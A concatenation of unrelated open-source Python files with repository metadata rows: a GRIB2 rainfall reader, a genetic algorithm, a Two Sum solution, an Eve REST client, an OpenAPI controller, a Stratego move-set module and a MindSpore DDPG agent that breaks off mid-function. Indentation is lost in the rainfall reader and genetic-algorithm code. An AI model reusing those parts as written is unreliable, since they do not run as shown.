rain = 0.5 * (rain + rain30)
## lon -180:0 --> 180:360
idx_neg_lon = [x for x in range(len(lon_rain)) if lon_rain[x] < -0.0001]
idx_pos_lon = [x for x in range(len(lon_rain)) if lon_rain[x] > -0.0001]
lon_rain = np.append(lon_rain[idx_pos_lon[0]:idx_pos_lon[-1]+1], 360.0 + lon_rain[idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=0)
rain = np.append(rain[:,idx_pos_lon[0]:idx_pos_lon[-1]+1], rain[:,idx_neg_lon[0]:idx_neg_lon[-1]+1], axis=1)
DATA={}
DATA['lon'] = lon_rain
DATA['lat'] = lat_rain
DATA['data'] = ma.masked_array(rain)
## Cut out area.
keep_lon, = np.where(np.logical_and(DATA['lon'] > area[0], DATA['lon'] < area[1]))
keep_lat, = np.where(np.logical_and(DATA['lat'] > area[2], DATA['lat'] < area[3]))
DATA['lon'] = DATA['lon'][keep_lon[0]:keep_lon[-1]+1]
DATA['lat'] = DATA['lat'][keep_lat[0]:keep_lat[-1]+1]
DATA['data'] = DATA['data'][keep_lat[0]:keep_lat[-1]+1, keep_lon[0]:keep_lon[-1]+1]
return DATA
################################################################################
################################################################################
################################################################################
"""
CFS Grib2 reading function
"""
def read_cfs_rt_at_datetime(dt_this, data_dir = './'
, fmt = 'cfs.%Y%m%d/%H/time_grib_01/prate.01.%Y%m%d%H.daily.grb2'
, records=range(1,45*4+1), verbose=False):
fn = (data_dir + '/' + dt_this.strftime(fmt))
if verbose:
print(fn, flush=True)
return read_cfs_rt_grib2(fn, records=records, verbose=verbose)
def read_cfs_rt_grib2(fn, records=range(1,45*4+1), verbose=False):
"""
RT = read_cfs_rt_grib2(fn, records=N)
N is the list of records to get.
By default, get the first 45 days, 6 hourly intervals.
example output:
In [23]: RT['lon'].shape
Out[23]: (384,)
In [24]: RT['lat'].shape
Out[24]: (190,)
In [25]: RT['precip'].shape
Out[25]: (180, 190, 384)
"""
import gdal # Import gdal if dealing with grib data.
DS = gdal.Open(fn, gdal.GA_ReadOnly)
width = DS.RasterXSize
height = DS.RasterYSize
lon = np.arange(0.0,359.062 + 0.5,0.938)
## grid file with Gaussian latitude was obtained from wgrib2 like this:
## wgrib2 -d 1 -gridout grid.txt /home/orca/data/model_fcst_grib/cfs/cfs.20190508/00/time_grib_01/prate.01.2019050800.daily.grb2
## awk -F, '{print $3}' grid.txt | uniq | tr "\n" ", "
lat = np.flip(np.array([-89.277, -88.340, -87.397, -86.454, -85.509
, -84.565, -83.620, -82.676, -81.731, -80.786
, -79.841, -78.897, -77.952, -77.007, -76.062
, -75.117, -74.173, -73.228, -72.283, -71.338
, -70.393, -69.448, -68.503, -67.559, -66.614
, -65.669, -64.724, -63.779, -62.834, -61.889
, -60.945, -60.000, -59.055, -58.110, -57.165
, -56.220, -55.275, -54.330, -53.386, -52.441
, -51.496, -50.551, -49.606, -48.661, -47.716
, -46.771, -45.827, -44.882, -43.937, -42.992
, -42.047, -41.102, -40.157, -39.212, -38.268
, -37.323, -36.378, -35.433, -34.488, -33.543
, -32.598, -31.653, -30.709, -29.764, -28.819
, -27.874, -26.929, -25.984, -25.039, -24.094
, -23.150, -22.205, -21.260, -20.315, -19.370
, -18.425, -17.480, -16.535, -15.590, -14.646
, -13.701, -12.756, -11.811, -10.866, -9.921
, -8.976, -8.031, -7.087, -6.142, -5.197
, -4.252, -3.307, -2.362, -1.417, -0.472
, 0.472, 1.417, 2.362, 3.307, 4.252
, 5.197, 6.142, 7.087, 8.031, 8.976
, 9.921, 10.866, 11.811, 12.756, 13.701
, 14.646, 15.590, 16.535, 17.480, 18.425
, 19.370, 20.315, 21.260, 22.205, 23.150
, 24.094, 25.039, 25.984, 26.929, 27.874
, 28.819, 29.764, 30.709, 31.653, 32.598
, 33.543, 34.488, 35.433, 36.378, 37.323
, 38.268, 39.212, 40.157, 41.102, 42.047
, 42.992, 43.937, 44.882, 45.827, 46.771
, 47.716, 48.661, 49.606, 50.551, 51.496
, 52.441, 53.386, 54.330, 55.275, 56.220
, 57.165, 58.110, 59.055, 60.000, 60.945
, 61.889, 62.834, 63.779, 64.724, 65.669
, 66.614, 67.559, 68.503, 69.448, 70.393
, 71.338, 72.283, 73.228, 74.173, 75.117
, 76.062, 77.007, 77.952, 78.897, 79.841
, 80.786, 81.731, 82.676, 83.620, 84.565
, 85.509, 86.454, 87.397, 88.340, 89.277]), axis=0)
num_list = []
for band in records:
if verbose:
print('Record #' + str(band), flush=True)
data_array = DS.GetRasterBand(band).ReadAsArray()
for row in data_array:
for value in row:
num_list.append(value*3600.0) # kg/m2/sec --> mm/h
DS = None # Close the file.
precip = np.array(num_list).reshape([len(records), len(lat), len(lon)])
DATA={}
DATA['lon'] = lon
DATA['lat'] = lat
DATA['precip'] = precip
return DATA
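# Worked example: with 6-hourly CFS output (fcst_resolution_hours == 6), readdata() above maps a
# 24-hour forecast to records=[4], i.e. the fourth 6-hourly record in the GRIB2 file.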
def read_cfsr_grib2(fn, band_list=None, verbose=False):
"""
RT = read_cfsr_grib2(fn)
example output:
In [23]: RT['lon'].shape
Out[23]: (384,)
In [24]: RT['lat'].shape
Out[24]: (190,)
In [25]: RT['precip'].shape
Out[25]: (180, 190, 384)
"""
    import gdal # Imported here as well (it is otherwise only imported inside read_cfs_rt_grib2).
    DS = gdal.Open(fn, gdal.GA_ReadOnly)
width = DS.RasterXSize
height = DS.RasterYSize
lon = np.arange(0.0,359.51,0.5)
lat = np.arange(90.0,-90.01,-0.5)
n_records = DS.RasterCount
num_list = []
if band_list is None:
band_list = range(1, n_records+1)
for band in band_list:
if verbose:
print((str(band) + ' of ' + str(n_records)))
data_array = DS.GetRasterBand(band).ReadAsArray()
for row in data_array:
for value in row:
num_list.append(value)
DS = None # Close the file.
precip = np.array(num_list).reshape([int(len(band_list)/6), 6, len(lat), len(lon)])
#precip /= 1e6 # Values in file are multiplied by 1e6.
# kg/m2 in 1h is equivalent to mm/h.
DATA={}
DATA['lon'] = lon
DATA['lat'] = lat
DATA['precip'] = precip
return DATA
def get_cfsr_6h_rain(dt_ending, verbose=False):
"""
Read in the rainfall using read_cfs_historical_grib2(fn)
Then calculate the 6 hourly rain rate (mm/h) and return it.
CFSR rain is stored in monthly files. It it initialized every 6 h,
and the data provide hourly accumulations (in kg/m^2, equivalent to mm) like this:
1:0:d=2011120100:APCP:surface:0-1 hour acc fcst:
2:94325:d=2011120100:APCP:surface:1-2 hour acc fcst:
3:193206:d=2011120100:APCP:surface:2-3 hour acc fcst:
4:309596:d=2011120100:APCP:surface:3-4 hour acc fcst:
5:421187:d=2011120100:APCP:surface:4-5 hour acc fcst:
6:537704:d=2011120100:APCP:surface:5-6 hour acc fcst:
To get the 6 hourly accumulation, all 6 of these need to be added.
Then take the mean (e.g., divide by 6h) to get mm/h.
"""
dt_beginning = dt_ending - dt.timedelta(hours=6)
if dt_beginning < dt.datetime(2011,3,31,23,59,0):
fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y')
+ '/apcp.gdas.' + dt_beginning.strftime('%Y%m') + '.grb2')
else:
fn_beginning = ('/home/orca/data/model_anal/cfsr/rain_accum/' + dt_beginning.strftime('%Y')
+ '/apcp.cdas1.' + dt_beginning.strftime('%Y%m') + '.grb2')
if verbose:
print(fn_beginning, flush=True)
rec_num = 1 + int((dt_beginning - dt.datetime(dt_beginning.year, dt_beginning.month,1,0,0,0)).total_seconds()/3600.0)
F = read_cfsr_grib2(fn_beginning, band_list=range(rec_num,rec_num+6,1), verbose=verbose)
precip6hr = np.nanmean(F['precip'], axis=1)[0]
DATA={}
DATA['lon'] = F['lon']
DATA['lat'] = F['lat']
DATA['precip'] = precip6hr
return DATA
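# Worked example: six hourly accumulations of, say, 1.2 mm each cover the 6-hour window, and their
# mean along the hourly axis is 1.2, i.e. the 6-hourly average rain rate in mm/h returned above.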
|
brandonwkerns/lpt-python-public
|
lpt/readdata.py
|
readdata.py
|
py
| 19,320 |
python
|
en
|
code
| 3 |
github-code
|
6
|
37559032301
|
import numpy as np
def fitness(f, x):
"""
Supplied function f(x) returns a value for fitness so long as f(x) has a range >= 0
:param f:
:param x:
:return:
"""
# return np.exp(f(x))
# e^y made table unreadable from extremely small numbers
# return f(x) if (int(x,2) > 0 and int(x,2) < 15) else 1
return f(x) if f(x) > 0 else 1
def generate_population(size):
pop = ['{0:04b}'.format(i) for i in range(size)]
return pop
def choose(population, size, relative=None):
if relative is None:
return np.random.choice(population, size)
    return np.random.choice(population, size, p=relative)
def choose_parents(group, relative):
x1, x2 = np.random.choice(a=group, p=relative, size=2)
return x1, x2
def crossover(a, b):
pivot = np.random.randint(0, max(len(a), len(b)), size=1)[0]
c1 = a[0:pivot] + b[pivot:len(b)]
c2 = b[0:pivot] + a[pivot:len(a)]
return c1, c2
def mutate(child):
pivot = np.random.randint(0, len(child))
if child[pivot] == '0':
r = '1'
else:
r = '0'
child = child[:pivot] + r + child[pivot+1:]
return child
def ga(func, pop_size=15, elite_size=6, generations=500, pc=0.7, pm=0.1):
mostfit = -1
fitnesses = None
relative = None
avgfits = []
population = generate_population (pop_size)
for epoch in range(1, generations):
print("===========================")
print("Generation", epoch)
print("---------------------------")
elites = choose(population, elite_size)
while elites.size < pop_size:
fitnesses = [fitness(func, elite) for elite in elites]
relative = [(x/sum(fitnesses)) for x in fitnesses]
            x1, x2 = choose(elites, 2, relative)
if np.random.random() <= pc:
c1, c2 = crossover(x1, x2)
if np.random.random() <= pm:
c1 = mutate(c1)
fitnesses.append(fitness(func, c1))
elites = np.append(elites, c1)
if np.random.random() <= pm:
c2 = mutate(c2)
                fitnesses.append(fitness(func, c2))
elites = np.append(elites, c2)
avgfits.append(np.mean(fitnesses))
population = elites
print("Average Fitness:", np.around(np.mean(fitnesses), decimals=3))
print("{:>2}{:>10}{:>10}{:>15}{:>15}".format("N", "bin", "int", "fitness", "relative"))
for i in range(len(elites)):
print("{:>2}{:>10}{:>10}{:>15.4g}{:>15.2g}".format(
i, elites[i], int(elites[i], 2), np.around(fitness(func, elites[i]), decimals=4),
fitnesses[i]/sum(fitnesses)))
print("===========================")
return population, avgfits
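# Minimal usage sketch (hypothetical objective, not part of the original module): maximise
# f(x) = x**2 over the 4-bit strings produced by generate_population().
if __name__ == "__main__":
    final_population, average_fitness_history = ga(lambda bits: int(bits, 2) ** 2,
                                                   generations=50)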
|
shottah/expert-systems
|
assignment-3/GA.py
|
GA.py
|
py
| 2,807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
5454371991
|
"""
Problem:
1. Two Sum
Difficulty:
Easy
URL:
https://leetcode.com/problems/two-sum
Tags:
Array, Hash Table
Date:
2022-05-10T14:00:29.877163+08:00
"""
from typing import List
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
for i, num in enumerate(nums):
if target - num in nums[i + 1:]:
return [i, nums.index(target - num, i + 1)]
tests = [
(
([2, 7, 11, 15], 9,
),
[0, 1],
),
(
([3, 2, 4], 6,
),
[1, 2],
),
(
([3, 3], 6,
),
[0, 1],
),
]
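# A minimal, hypothetical test runner (not part of the original solution file): each entry in
# `tests` is an (arguments, expected) pair, so the argument tuple can be unpacked directly.
if __name__ == "__main__":
    for args, expected in tests:
        assert Solution().twoSum(*args) == expected
    print("all tests passed")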
|
s0u0b/leetcode
|
solutions/a00001_two_sum.py
|
a00001_two_sum.py
|
py
| 630 |
python
|
en
|
code
| 0 |
github-code
|
6
|
43954128076
|
import json
import requests # see http://python-requests.org
def url_for(endpoint):
return 'http://localhost:5000/{}/'.format(endpoint)
def delete_all_people():
r = requests.delete(url_for('people'))
print("'people' deleted, server response:", r.status_code)
def post_people():
data = [
{'firstname': 'John', 'lastname': 'Doe'},
{'firstname': 'Mike', 'lastname': 'Green'},
]
response = requests.post(
url_for('people'),
json.dumps(data),
headers={'Content-Type': 'application/json'}
)
print("'people' posted, server response:", response.status_code)
def get_people():
r = requests.get(url_for('people'))
print('people downloaded, server response:', r.status_code)
if r.status_code == 200:
people = r.json()['_items']
print('{} people:'.format(len(people)))
for person in people:
print('{}, {}'.format(person['firstname'], person['_id']))
def main():
delete_all_people()
post_people()
get_people()
if __name__ == '__main__':
main()
|
talkpython/eve-building-restful-mongodb-backed-apis-course
|
code/clients/client.py
|
client.py
|
py
| 1,081 |
python
|
en
|
code
| 62 |
github-code
|
6
|
11250773237
|
import connexion
from openapi_server import orm
from openapi_server.db import db
from openapi_server.models.error import Error # noqa: E501
from openapi_server.models.qc_result import QcResult # noqa: E501
def samples_id_qc_result_delete(id): # noqa: E501
"""samples_id_qc_result_delete
Delete the QC result associated with a sample with {id}. # noqa: E501
:param id:
:type id: str
:rtype: None
"""
sample = orm.Sample.query.get(id)
if not sample or not sample.qc_result:
return Error(404, 'Not found'), 404
db.session.delete(sample.qc_result)
db.session.commit()
return '', 204
def samples_id_qc_result_get(id): # noqa: E501
"""samples_id_qc_result_get
Return the QC result associated with a sample. # noqa: E501
:param id:
:type id: str
:rtype: QcResult
"""
sample = orm.Sample.query.get(id)
if not sample or not sample.qc_result:
return Error(404, 'Not found'), 404
return sample.qc_result.to_model(), 200
def samples_id_qc_result_put(id, qc_result=None): # noqa: E501
"""samples_id_qc_result_put
Add or replace new QC result associated with a sample. # noqa: E501
:param id:
:type id: str
:param qc_result: QC result to be added
:type qc_result: dict | bytes
:rtype: QcResult
"""
if connexion.request.is_json:
qc_result = QcResult.from_dict(connexion.request.get_json()) # noqa: E501
sample = orm.Sample.query.get(id)
if not sample:
return Error(404, 'Not found'), 404
inst = orm.QcResult.from_model(qc_result)
inst.sample_id = sample.id
if sample.qc_result:
sample.qc_result = inst
else:
db.session.add(inst)
db.session.commit()
return inst.to_model(), 200, {'location': ''}
|
Mykrobe-tools/mykrobe-atlas-tracking-api
|
openapi_server/controllers/qc_result_controller.py
|
qc_result_controller.py
|
py
| 1,810 |
python
|
en
|
code
| 0 |
github-code
|
6
|
75051529788
|
import logging
import random
from typing import Set, Generator, Optional
from .location import Location
from .move import Move
from .piece import Color, Piece, Rank
from .board import Board
class MoveSet:
_brd = None # type: Board
@staticmethod
def set_board(brd: Board) -> None:
r""" Sets the board for the entire class """
MoveSet._brd = brd
r""" Moves available to a player """
def __init__(self, color: Color):
r"""
:param color: Color that is making the moves
"""
self._avail = dict() # Available moves
self._color = color
@property
def avail(self) -> dict:
r""" Accessor for the available moves """
return self._avail
@staticmethod
def build(pieces: Set[Piece], locs: dict, other_locs: dict) -> 'MoveSet':
r"""
Factory method used to construct an initial move set.
:param pieces: All of the players pieces
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
:return: Constructed move set
"""
assert MoveSet._brd is not None, "Board information be present"
assert pieces, "Piece set can never be empty"
color = next(iter(pieces)).color
ms = MoveSet(color)
for p in pieces:
ms.add_piece(p, locs, other_locs)
return ms
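    # Usage sketch (names are illustrative): the board must be registered once before building,
    # e.g. MoveSet.set_board(board) followed by moves = MoveSet.build(pieces, piece_locs, other_locs).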
def add_piece(self, piece: Piece, locs: dict, other_locs: dict):
r"""
Add a piece's moves to the MoveSet
:param piece: Piece whose moves (if any) will be added
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
"""
self._process_piece(piece, locs, other_locs, add=True)
def del_piece(self, piece: Piece, locs: dict, other_locs: dict):
r"""
Add a piece's moves to the MoveSet
:param piece: Piece whose moves (if any) will be added
:param locs: Location of the player pieces
:param other_locs: Location of pieces of other player
"""
self._process_piece(piece, locs, other_locs, add=False)
def _process_piece(self, piece: Piece, locs: dict, other_locs: dict, add: bool):
r"""
Standardizes adding/removing a piece since same algorithm with minor change.
:param piece: Piece to process
:param locs: Location for pieces of same color as \p Piece
:param other_locs: Location for other player's pieces
:param add: If True, add the piece, otherwise remove the piece
"""
# Verify color is same for all pieces
assert piece.color == self._color, "Piece set has pieces of different colors"
# Standard function for either adding or deleting a move
def _process_func(_p: Piece, _loc: Location):
if add:
try: self._add_move(_p, _loc, other_locs[_loc])
except KeyError: self._add_move(_p, _loc)
else: self._del_move(_p, _loc)
# Bombs and flags can be ignored
if piece.is_immobile(): return
# Check ordinary pieces
if piece.rank != Rank.scout():
for loc in piece.loc.neighbors():
# Ignore pieces not allowed by board or where piece of same color
if not self._brd.is_inside(loc) or loc in locs: continue
_process_func(piece, loc)
# Check scout pieces specially
else:
for direction_list in self._brd.to_edge_lists(piece.loc):
for loc in direction_list:
# If scout blocked by board location or same color, immediately stop
if not self._brd.is_inside(loc) or loc in locs: break
_process_func(piece, loc)
if loc in other_locs: break
def _add_move(self, p: Piece, other: Location, attacked: Optional[Piece] = None) -> None:
r""" Add \p piece's move to \p other to the \p MoveSet """
assert p.is_scout() or p.loc.is_adjacent(other)
key = self._make_move_key(p.loc, other)
# assert key not in self._avail
self._avail[key] = Move(p, p.loc, other, attacked)
def _del_move(self, p: Piece, other: Location) -> None:
r"""
Delete the corresponding move from the \p MoveSet
:param p: Piece whose move will be deleted
:param other: Location where \p p will be moved
"""
assert p.is_scout() or p.loc.is_adjacent(other)
key = self._make_move_key(p.loc, other)
del self._avail[key]
def has_move(self, p: Piece, new_loc: Location) -> bool:
r""" Returns True if the \p Piece has an availble move to the specified \p Location """
key = self._make_move_key(p.loc, new_loc)
return key in self._avail
def get_move(self, p: Piece, new_loc: Location) -> Optional[Move]:
r"""
Gets the move corresponding to the \p Piece and \p Location. If the corresponding \p Move
is not found, \p None is returned.
"""
key = self._make_move_key(p.loc, new_loc)
try: return self._avail[key]
except KeyError: return None
def __len__(self) -> int:
r""" Return number of moves in the \p MoveSet """
return len(self._avail)
def __contains__(self, item: Move) -> bool:
r""" Adds support for the "in" operator """
if item.piece is None: return False
return self.has_move(item.piece, item.new)
def remove_moves_after_add(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None:
r"""
Process the adding of a piece at Location \p loc
:param loc: Location of added piece
:param plyr_locs: Location of pieces for same color as \p MoveSet
:param other_locs: Location of pieces of other \p Player
"""
self._handle_loc_change(loc, plyr_locs, other_locs, False)
def add_moves_after_delete(self, loc: Location, plyr_locs: dict, other_locs: dict) -> None:
r"""
Process the deletion of a piece that was at Location \p loc
:param loc: Location of deleted piece
:param plyr_locs: Location of pieces for same color as \p MoveSet
:param other_locs: Location of pieces of other \p Player
"""
self._handle_loc_change(loc, plyr_locs, other_locs, True)
def _handle_loc_change(self, loc: Location, plyr_locs: dict, other_locs: dict, add: bool):
r"""
        Process a \p Location's state change by either removing or adding moves to the MoveSet.
:param loc: Location whose state is being changed
:param plyr_locs: Locations of the implicit player's pieces
:param other_locs: Location dictionary for the other player
:param add: If True, add moves to the MoveSet. Otherwise, remove those locations.
"""
el = self._brd.to_edge_lists(loc)
el_groups = [(el.right, el.left), (el.left, el.right), (el.up, el.down), (el.down, el.up)]
def _add_func(_p: Piece, _loc: Location):
try: self._add_move(_p, _loc, other_locs[_loc])
except KeyError: self._add_move(_p, _loc)
for search, opp in el_groups:
# Find first piece in search direction (if any)
p = None
for srch in search:
if srch in plyr_locs: p = plyr_locs[srch]
elif srch in other_locs: p = other_locs[srch]
if p is not None: break
# If no piece in search direction
if p is None or p.is_immobile(): continue
# Ignore pieces of other color since will be handled in separate function call
if p.color != self._color: continue
# If found p is not a scout and not adjacent, move on
if not p.is_scout() and not p.loc.is_adjacent(loc): continue
# Delete first since may need to add in next step
if not add: self._del_move(p, loc)
# In an add, always add the move. In a delete, may need to add back if the moved
# piece is of the other player's color
if add or loc in other_locs:
_add_func(p, loc)
if p.is_scout():
for srch in opp:
if srch in plyr_locs: break
if add: _add_func(p, srch)
else: self._del_move(p, srch)
# Perform second since could still attack
if srch in other_locs: break
@staticmethod
def _make_move_key(orig: Location, new: Location):
return orig, new
def is_empty(self, cyclic_moves: Set[Move] = None) -> bool:
r""" Returns \p True if the \p MoveSet is empty """
if cyclic_moves is not None and cyclic_moves:
avail = set(self.avail.values())
# If available larger than cyclic, definitely not empty move set
if len(avail) > len(cyclic_moves): return False
            # Check if each available move is in cyclic. If any is not, the move set is not empty
for a_m in avail:
for c_m in cyclic_moves:
if Move.is_identical(a_m, c_m):
break
else:
return False
return True
return not bool(self.avail)
def __iter__(self):
return iter(self.avail.values())
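# Illustrative sketch (not part of the original module): MoveSet stores its moves in a
# dictionary keyed by the (origin, destination) pair, so has_move/get_move are O(1)
# lookups. The plain tuples below only stand in for Location objects to show the pattern.
def _keyed_move_lookup_demo():
    avail = {((0, 0), (0, 1)): "move a", ((2, 3), (2, 4)): "move b"}
    return ((0, 0), (0, 1)) in avail  # constant-time membership test, mirrors has_move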
class Player:
r""" Represents one of the two players """
def __init__(self, color: Color):
r"""
:param color: Color of the player
"""
self._color = color
# noinspection PyTypeChecker
self._move_set = None # type: MoveSet
self._locs = dict()
self._pieces = set()
@property
def color(self) -> Color:
r""" Accessor for the \p Player's \p Color. """
return self._color
@property
def num_pieces(self) -> int:
r""" Accessor for number of pieces the player has """
return len(self._pieces)
@property
def move_set(self) -> MoveSet:
r""" Accessor for the \p Player's \p MoveSet"""
return self._move_set
def add_piece(self, piece: Piece, other: 'Player' = None) -> None:
r""" Add \p piece to \p Player's set of pieces """
assert piece not in self._pieces, "Duplicate piece"
assert piece.loc not in self._locs, "Two pieces in same location"
self._pieces.add(piece)
self._locs[piece.loc] = piece
if other is not None:
assert self._color != other.color
self.move_set.add_piece(piece, self._locs, other._locs)
def delete_piece_info(self, piece: Piece, other: 'Player') -> None:
r""" Remove \p piece from the \p Player's set of pieces """
self._pieces.remove(piece)
del self._locs[piece.loc]
self.move_set.del_piece(piece, self._locs, other._locs)
def delete_moveset_info(self, loc: Location, other: 'Player') -> None:
r""" Update the MoveSet information after deleting a piece at Location \p loc """
assert self._color != other.color
self.move_set.add_moves_after_delete(loc, self._locs, other._locs)
def update_moveset_after_add(self, loc: Location, other: 'Player') -> None:
r"""
When adding a piece (i.e., moving it and placing it back down), some previously valid moves
        become blocked. This method updates \p MoveSet to accommodate that.
:param loc: \p Location where piece was placed
:param other: Other player
"""
assert self._color != other.color
# pylint: disable=protected-access
self.move_set.remove_moves_after_add(loc, self._locs, other._locs)
def has_flag(self) -> bool:
r""" Returns True if the player has a flag """
flag = Rank.flag()
return any(p.rank == flag for p in self._pieces)
def get_piece_at_loc(self, loc: Location) -> Optional[Piece]:
r""" Returns the piece at the specified location. If no piece is there, returns None """
try: return self._locs[loc]
except KeyError: return None
def has_move(self, piece: Piece, new_loc: Location) -> bool:
r""" Returns \p True if the player has a move for the piece ot the specified \p Location """
assert piece is not None
return self.move_set.has_move(piece, new_loc)
def is_valid_next(self, m: Move) -> bool:
r"""
        Checks whether move \p m is in the player's \p MoveSet
:param m: \p Move to check
:return: True if \p m is a valid next move.
"""
return m in self.move_set
def get_move(self, piece: Piece, new_loc: Location) -> Optional[Move]:
r""" Returns \p True if the player has a move for the piece ot the specified \p Location """
assert piece is not None
return self.move_set.get_move(piece, new_loc)
def piece_locations(self) -> Set[Location]:
r""" Location of all of the \p Player's pieces """
set_locs = set(self._locs.keys())
assert len(set_locs) == len(self._pieces)
return set_locs
def pieces(self) -> Generator[Piece, None, None]:
r""" Generator that yields the Player's pieces """
for p in self._pieces:
yield p
def build_move_set(self, other: 'Player'):
r""" Construct the move set of the """
assert self._color != other.color
self._move_set = MoveSet.build(self._pieces, self._locs, other._locs)
def verify_piece_set(self, piece_set: Board.PieceSet) -> bool:
r"""
        Verify that the player piece information is in compliance with the \p Board \p PieceSet
:param piece_set: Piece set maximum counts
:return: True if the player's piece set information is in compliance
"""
pieces_by_rank = dict()
# Count the number of pieces for each rank
for p in self._pieces:
try: pieces_by_rank[p.rank] += 1
except KeyError: pieces_by_rank[p.rank] = 1
res = True
for r in Rank.get_all():
if r in pieces_by_rank and pieces_by_rank[r] > piece_set.get_rank_count(r):
logging.warning("Color %s has too many pieces of rank: \"%s\"", self._color.name, r)
res = False
return res
def get_random_move(self) -> Move:
r"""
Selects a piece to move uniformly at random. Then select the move from that piece's
available moves uniformly at random.
:return: Randomly selected move
"""
move_dict = dict()
keys = []
for m in self.move_set.avail.values():
try:
move_dict[m.piece].append(m)
except KeyError:
keys.append(m.piece)
move_dict[m.piece] = [m]
key = random.choice(keys)
return random.choice(move_dict[key])
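# Illustrative sketch (not part of the original module) of the two-stage sampling used by
# get_random_move above: first pick a piece uniformly at random, then pick one of that
# piece's moves uniformly at random. Note this is not uniform over all moves - pieces
# with few available moves are relatively favoured.
def _two_stage_sample_demo(moves_by_piece):
    # moves_by_piece: any hashable stand-in for a piece, mapped to its list of moves
    piece = random.choice(list(moves_by_piece.keys()))
    return random.choice(moves_by_piece[piece])
# e.g. _two_stage_sample_demo({"scout": ["a", "b", "c"], "marshal": ["d"]})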
|
ZaydH/stratego
|
src/stratego/player.py
|
player.py
|
py
| 14,932 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21276696396
|
import mindspore
from mindspore import Tensor, nn
from mindspore.common.initializer import Uniform, VarianceScaling
from mindspore.ops import composite as C
from mindspore.ops import operations as P
from mindspore_rl.agent.actor import Actor
from mindspore_rl.agent.learner import Learner
from mindspore_rl.utils import OUNoise, SoftUpdate
class HuberLoss(nn.Cell):
"""Huber Loss"""
def __init__(self, delta=1.0):
super().__init__()
self.delta = Tensor(delta, mindspore.float32)
self.abs = P.Abs()
self.square = P.Square()
self.select = P.Select()
self.reduce_sum = P.ReduceSum()
def construct(self, predict, label):
abs_error = self.abs(predict - label)
cond = abs_error <= self.delta
loss = self.select(
cond,
0.5 * self.square(abs_error),
self.delta * abs_error - 0.5 * self.square(self.delta),
)
return self.reduce_sum(loss)
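# Reference-only sketch (not used by the classes below): the same piecewise Huber loss in
# plain Python, to make explicit what HuberLoss.construct computes. The helper name and
# the sample values are illustrative assumptions, not part of the MindSpore API.
def _huber_reference(errors, delta=1.0):
    total = 0.0
    for e in errors:
        a = abs(e)
        # quadratic inside |e| <= delta, linear outside
        total += 0.5 * a * a if a <= delta else delta * a - 0.5 * delta * delta
    return total
# e.g. _huber_reference([0.5, 2.0]) == 0.125 + 1.5 == 1.625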
class DDPGPolicy:
"""This is DDPGPolicy class. You should define your networks (DDPGActorNet and DDPGCriticNet here)
    which you intend to use in the algorithm. Moreover, you should also define your loss function
(DDPGLossCell here) which calculates the loss between policy and your ground truth value.
"""
class DDPGActorNet(nn.Cell):
"""DDPGActorNet is the actor network of DDPG algorithm. It takes a set of state as input
and outputs miu, sigma of a normal distribution"""
def __init__(
self,
input_size,
hidden_size1,
hidden_size2,
output_size,
compute_type=mindspore.float32,
):
super(DDPGPolicy.DDPGActorNet, self).__init__()
weight_init = VarianceScaling(
scale=1.0 / 3, mode="fan_in", distribution="uniform"
)
self.dense1 = nn.Dense(
input_size, hidden_size1, weight_init=weight_init
).to_float(compute_type)
self.dense2 = nn.Dense(
hidden_size1, hidden_size2, weight_init=weight_init
).to_float(compute_type)
last_weight_init = Uniform(scale=0.003)
self.dense3 = nn.Dense(
hidden_size2, output_size, weight_init=last_weight_init
).to_float(compute_type)
self.tanh = P.Tanh()
self.relu = P.ReLU()
def construct(self, x):
"""calculate"""
x = self.relu(self.dense1(x))
x = self.relu(self.dense2(x))
x = self.tanh(self.dense3(x))
return x
class DDPGCriticNet(nn.Cell):
"""DDPGCriticNet is the critic network of DDPG algorithm. It takes a set of states as input
and outputs the value of input state"""
def __init__(
self,
obs_size,
action_size,
hidden_size1,
hidden_size2,
output_size,
compute_type=mindspore.float32,
):
super(DDPGPolicy.DDPGCriticNet, self).__init__()
weight_init = VarianceScaling(
scale=1.0 / 3, mode="fan_in", distribution="uniform"
)
self.dense1 = nn.Dense(
obs_size, hidden_size1, weight_init=weight_init
).to_float(compute_type)
self.dense2 = nn.Dense(
hidden_size1 + action_size, hidden_size2, weight_init=weight_init
).to_float(compute_type)
last_weight_init = Uniform(scale=0.003)
self.dense3 = nn.Dense(
hidden_size2, output_size, weight_init=last_weight_init
).to_float(compute_type)
self.concat = P.Concat(axis=-1)
self.relu = P.ReLU()
self.cast = P.Cast()
def construct(self, observation, action):
"""predict value"""
x = self.relu(self.dense1(observation))
action = self.cast(action, x.dtype)
x = self.concat((x, action))
x = self.relu(self.dense2(x))
x = self.dense3(x)
return x
def __init__(self, params):
        # nn.Cell does not support clone or deepcopy. Create target networks manually.
self.actor_net = self.DDPGActorNet(
params["state_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
params["action_space_dim"],
params["compute_type"],
)
self.target_actor_net = self.DDPGActorNet(
params["state_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
params["action_space_dim"],
params["compute_type"],
)
self.critic_net = self.DDPGCriticNet(
params["state_space_dim"],
params["action_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
1,
params["compute_type"],
)
self.target_critic_net = self.DDPGCriticNet(
params["state_space_dim"],
params["action_space_dim"],
params["hidden_size1"],
params["hidden_size2"],
1,
params["compute_type"],
)
class DDPGActor(Actor):
"""This is an actor class of DDPG algorithm, which is used to interact with environment, and
generate/insert experience (data)"""
def __init__(self, params=None):
super().__init__()
self.actor_net = params["actor_net"]
self.env = params["collect_environment"]
self.expand_dims = P.ExpandDims()
self.squeeze = P.Squeeze()
low, high = self.env.action_space.boundary
self.clip_value_min = Tensor(low)
self.clip_value_max = Tensor(high)
self.noise = OUNoise(
params["stddev"], params["damping"], self.env.action_space.shape
)
def act(self, phase, params):
"""collect experience and insert to replay buffer (used during training)"""
actions = self.get_action(phase, params)
next_obs, rewards, done = self.env.step(actions)
rewards = self.expand_dims(rewards, 0)
done = self.expand_dims(done, 0)
return next_obs, actions, rewards, done
def get_action(self, phase, params):
"""get action"""
obs = self.expand_dims(params, 0)
actions = self.actor_net(obs)
actions = self.squeeze(actions)
if phase != 3:
actions = self.noise(actions)
